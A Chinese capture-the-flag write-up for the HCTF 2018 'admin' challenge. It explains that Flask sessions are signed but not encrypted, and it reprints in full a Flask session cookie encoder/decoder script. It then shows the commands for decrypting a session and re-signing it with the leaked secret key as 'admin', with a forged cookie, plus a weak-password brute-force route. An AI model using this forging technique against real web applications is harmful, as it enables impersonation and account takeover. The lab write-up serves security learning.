BUU [HCTF 2018]admin
阿新 • • 發佈:2022-04-08
這裡先做的是第一種方法 偽造session 參考文章:
https://www.jianshu.com/p/f92311564ad0
flask的session是儲存在客戶端cookie中的,而且flask僅僅對資料進行了簽名。眾所周知的是,簽名的作用是防篡改,而無法防止被讀取。
而flask並沒有提供加密操作,所以其session的全部內容都是可以在客戶端讀取的,這就可能造成一些安全問題。
首先經過註冊後在change pasword裡面檢視原始碼,可以看到一個github 的下載連結
下載後看到的原始碼裡面在config.py裡可以看到secret_key,
結合登入成功的session
和網上找到的flask session 加密指令碼
1 """ Flask Session Cookie Decoder/Encoder """ 2 __author__ = 'Wilson Sumanang, Alexandre ZANNI' 3 4 # standard imports 5 import sys 6 import zlib 7 from itsdangerous import base64_decode 8 import ast 9 10 # Abstract Base Classes (PEP 3119) 11 if sys.version_info[0] < 3: #< 3.0 12 raise Exception('Must be using at least Python 3') 13 elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4 14 from abc import ABCMeta, abstractmethod 15 else: # > 3.4 16 from abc import ABC, abstractmethod 17 18 # Lib for argument parsing19 import argparse 20 21 # external Imports 22 from flask.sessions import SecureCookieSessionInterface 23 24 class MockApp(object): 25 26 def __init__(self, secret_key): 27 self.secret_key = secret_key 28 29 30 if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4 31 class FSCM(metaclass=ABCMeta): 32 def encode(secret_key, session_cookie_structure): 33 """ Encode a Flask session cookie """ 34 try: 35 app = MockApp(secret_key) 36 37 session_cookie_structure = dict(ast.literal_eval(session_cookie_structure)) 38 si = SecureCookieSessionInterface() 39 s = si.get_signing_serializer(app) 40 41 return s.dumps(session_cookie_structure) 42 except Exception as e: 43 return "[Encoding error] {}".format(e) 44 raise e 45 46 47 def decode(session_cookie_value, secret_key=None): 48 """ Decode a Flask cookie """ 49 try: 50 if(secret_key==None): 51 compressed = False 52 payload = session_cookie_value 53 54 if payload.startswith('.'): 55 compressed = True 56 payload = payload[1:] 57 58 data = payload.split(".")[0] 59 60 data = base64_decode(data) 61 if compressed: 62 data = zlib.decompress(data) 63 64 return data 65 else: 66 app = MockApp(secret_key) 67 68 si = SecureCookieSessionInterface() 69 s = si.get_signing_serializer(app) 70 71 return s.loads(session_cookie_value) 72 except Exception as e: 73 return "[Decoding error] {}".format(e) 74 raise e 75 else: # > 3.4 76 class FSCM(ABC): 77 def encode(secret_key, session_cookie_structure): 78 """ Encode a Flask session cookie """ 79 try: 80 app = MockApp(secret_key) 81 82 session_cookie_structure = dict(ast.literal_eval(session_cookie_structure)) 83 si = SecureCookieSessionInterface() 84 s = si.get_signing_serializer(app) 85 86 return s.dumps(session_cookie_structure) 87 except Exception as e: 88 return "[Encoding error] {}".format(e) 89 raise e 90 91 92 def decode(session_cookie_value, secret_key=None): 93 """ Decode a Flask cookie """ 94 try: 95 if(secret_key==None): 96 compressed = False 97 payload = session_cookie_value 98 99 if payload.startswith('.'): 100 compressed = True 101 payload = payload[1:] 102 103 data = payload.split(".")[0] 104 105 data = base64_decode(data) 106 if compressed: 107 data = zlib.decompress(data) 108 109 return data 110 else: 111 app = MockApp(secret_key) 112 113 si = SecureCookieSessionInterface() 114 s = si.get_signing_serializer(app) 115 116 return s.loads(session_cookie_value) 117 except Exception as e: 118 return "[Decoding error] {}".format(e) 119 raise e 120 121 122 if __name__ == "__main__": 123 # Args are only relevant for __main__ usage 124 125 ## Description for help 126 parser = argparse.ArgumentParser( 127 description='Flask Session Cookie Decoder/Encoder', 128 epilog="Author : Wilson Sumanang, Alexandre ZANNI") 129 130 ## prepare sub commands 131 subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand') 132 133 ## create the parser for the encode command 134 parser_encode = subparsers.add_parser('encode', help='encode') 135 parser_encode.add_argument('-s', '--secret-key', metavar='<string>', 136 help='Secret key', required=True) 137 parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>', 138 help='Session cookie structure', required=True) 139 140 ## create the parser for the decode command 141 parser_decode = subparsers.add_parser('decode', help='decode') 142 parser_decode.add_argument('-s', '--secret-key', metavar='<string>', 143 help='Secret key', required=False) 144 parser_decode.add_argument('-c', '--cookie-value', metavar='<string>', 145 help='Session cookie value', required=True) 146 147 ## get args 148 args = parser.parse_args() 149 150 ## find the option chosen 151 if(args.subcommand == 'encode'): 152 if(args.secret_key is not None and args.cookie_structure is not None): 153 print(FSCM.encode(args.secret_key, args.cookie_structure)) 154 elif(args.subcommand == 'decode'): 155 if(args.secret_key is not None and args.cookie_value is not None): 156 print(FSCM.decode(args.cookie_value,args.secret_key)) 157 elif(args.cookie_value is not None): 158 print(FSCM.decode(args.cookie_value))
插兩句話簡單介紹這個指令碼的用法:
解密:python flask_session_manager.py decode -c -s # -c是flask cookie裡的session值 -s引數是SECRET_KEY
加密:python flask_session_manager.py encode -s -t # -s引數是SECRET_KEY -t引數是session的參照格式,也就是session解密後的格式
將剛剛那個session複製下來,解密後變成明文的session是
{'_fresh': True, '_id': b'd4fb1018e2d755b05dc2163ec54429923444654de222c27ca8c8855643c55e1a47bfa0e1a50478a7952b1a899c81164ccebf8ea54087ad381b8563cb02de9fa2', 'csrf_token': b'8383dbf30b1cdfbf0f180c842975968ee3858874', 'image': b'F38w', 'name': 'miracle778', 'user_id': '10'}
將name後面的值改為admin再回頭去加密,因為要修改為admin身份登入
得到的session
.eJw9kE-LwjAQxb_KMmcP6R8vgoddoqXCJLSkleQiamubaeNCVepW_O6bdcHbgzfz4733gN1pqC8tLK7DrZ7BzlaweMDHARZgeO40rUZUbY8ui4QqLfKy01N6FyR6PRVM8HQuVToJnjFBBTNJ8YO0IaSKtGpJ8iYQSjMMMRDb4q5VFmlnWkz-dDEKfoy1Os6F2ljcrmKpev-z8vycdFhaQ23v7xjyJtLbbJJ8bSUvQgyFz7LpjOqdVukSnjM4XobT7vrd1ed3BckxxjD3GBw1rckkxusvh6oZ9dQwpM7X6kKZlD1OTeDjRuJz-cJZt2_qNyknjKvx3znvnTdgXzl7hhncLvXw2g0CBs9fJX1ssA.XPPSPQ.UZ-MG3ZUrN4nJzOXIsfjGdeiyLc
回到頁面或者在burpsuite裡面修改session,得到flag
直接弱密碼爆破出的123,也可以得到flag